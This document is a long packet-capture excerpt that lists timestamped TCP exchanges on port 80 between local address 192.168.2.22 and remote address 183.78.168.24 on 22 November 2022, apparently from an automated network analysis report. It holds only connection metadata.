                                                                                Nov 22, 2022 05:09:10.395772934 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.395817041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395869970 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.395869970 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.396044016 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396099091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396100998 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.396151066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396207094 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.396327972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396382093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396435022 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396440029 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.396760941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396816969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396822929 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.396873951 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396930933 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.396934032 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.396991014 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397042990 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397047997 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.397100925 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397156954 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.397157907 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397209883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397264004 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.397306919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397517920 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397571087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397583961 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.397624016 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397677898 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397677898 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.397730112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397783041 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.397901058 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.397954941 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.398006916 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.398006916 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.547982931 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548055887 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548091888 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.548110962 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548167944 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548170090 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.548219919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548273087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548274040 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.548325062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548378944 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548378944 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.548432112 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548485041 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.548485041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548537970 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548588991 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.548680067 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548734903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548789024 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.548791885 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.549874067 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.549932003 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.549947023 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.549985886 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550040960 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.550086975 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550189972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550246000 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.550306082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550364017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550415993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550425053 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.550525904 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550585032 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.550633907 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550751925 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550813913 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.550909996 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.550970078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551027060 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.551028967 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551086903 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551142931 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.551187992 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551240921 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551294088 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.551379919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551434994 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551486969 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.551532030 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551584959 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551637888 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.551709890 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551764965 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551815987 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.551861048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551913977 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.551968098 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.552035093 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552090883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552140951 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.552186966 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552356005 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552416086 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552438974 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.552473068 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552524090 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552525043 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.552627087 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552685022 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.552731037 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552846909 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552911043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.552938938 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.553076029 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553136110 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553144932 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.553189039 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553253889 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.553291082 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553347111 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553402901 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.553504944 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553559065 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553617954 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.553644896 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553700924 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.553772926 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.553809881 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.702820063 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.702922106 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.702938080 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.702981949 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703036070 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703043938 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703090906 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703144073 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703145981 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703197956 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703253031 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703258038 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703403950 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703460932 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703500032 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703573942 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703643084 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703694105 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703705072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703772068 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703777075 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703835011 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.703934908 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.703991890 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704056025 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704155922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704226971 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.704354048 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704447985 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704504013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704519987 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.704560995 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704688072 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704749107 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.704849005 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.704931974 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.704955101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705017090 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705131054 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705190897 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705219984 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.705245972 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705302954 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.705343008 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705442905 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705511093 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.705518007 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705631018 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705693007 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705775023 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.705821991 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705878973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.705883980 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.705990076 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706056118 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.706089020 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706193924 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706254959 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.706293106 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706348896 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706403017 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.706403971 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706504107 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706558943 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706559896 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.706656933 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706727028 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.706760883 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706912041 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706971884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.706981897 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.707026958 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707091093 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.707127094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707180023 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707241058 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.707321882 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707428932 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707482100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707494020 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.707565069 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707619905 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707629919 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.707756042 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707814932 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.707865953 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707921982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707973957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.707977057 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.857640982 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.857728004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.857789040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.857844114 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.857897043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.857958078 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.857971907 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.858022928 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858077049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858129025 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858146906 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.858187914 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858311892 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.858331919 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858388901 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858444929 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.858499050 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858560085 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858613014 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858613968 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.858762026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858865976 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.858885050 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.858963013 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859014034 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.859023094 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859076977 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859155893 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.859180927 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859282970 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859347105 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.859394073 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859456062 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859518051 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.859564066 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859616995 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859690905 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.859720945 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859824896 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859879017 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.859889984 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.859996080 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860085011 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860222101 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860225916 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.860282898 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860337973 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860397100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860415936 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.860533953 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.860554934 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860615969 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860677004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860697985 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.860738993 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.860805988 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.860897064 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861002922 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861063957 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861107111 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.861129045 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861239910 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861289978 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.861304998 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861361980 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861406088 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.861515999 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.861754894 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.861963034 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862024069 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862076044 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862083912 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.862133026 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862193108 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862237930 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.862251043 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862306118 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862320900 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.862365961 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862431049 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862484932 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862495899 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.862540960 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862557888 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:10.862602949 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862662077 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:10.862670898 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.012356997 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012425900 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012466908 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012480974 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.012509108 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012522936 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.012550116 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012603045 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.012679100 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012785912 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012840033 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.012864113 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012940884 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012980938 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.012983084 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.013056040 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013199091 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013240099 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.013256073 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013295889 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013303041 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.013405085 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013452053 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.013513088 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013556004 CET8049175183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:09:11.013601065 CET4917580192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:09:11.013685942 CET8049175183.78.168.24192.168.2.22
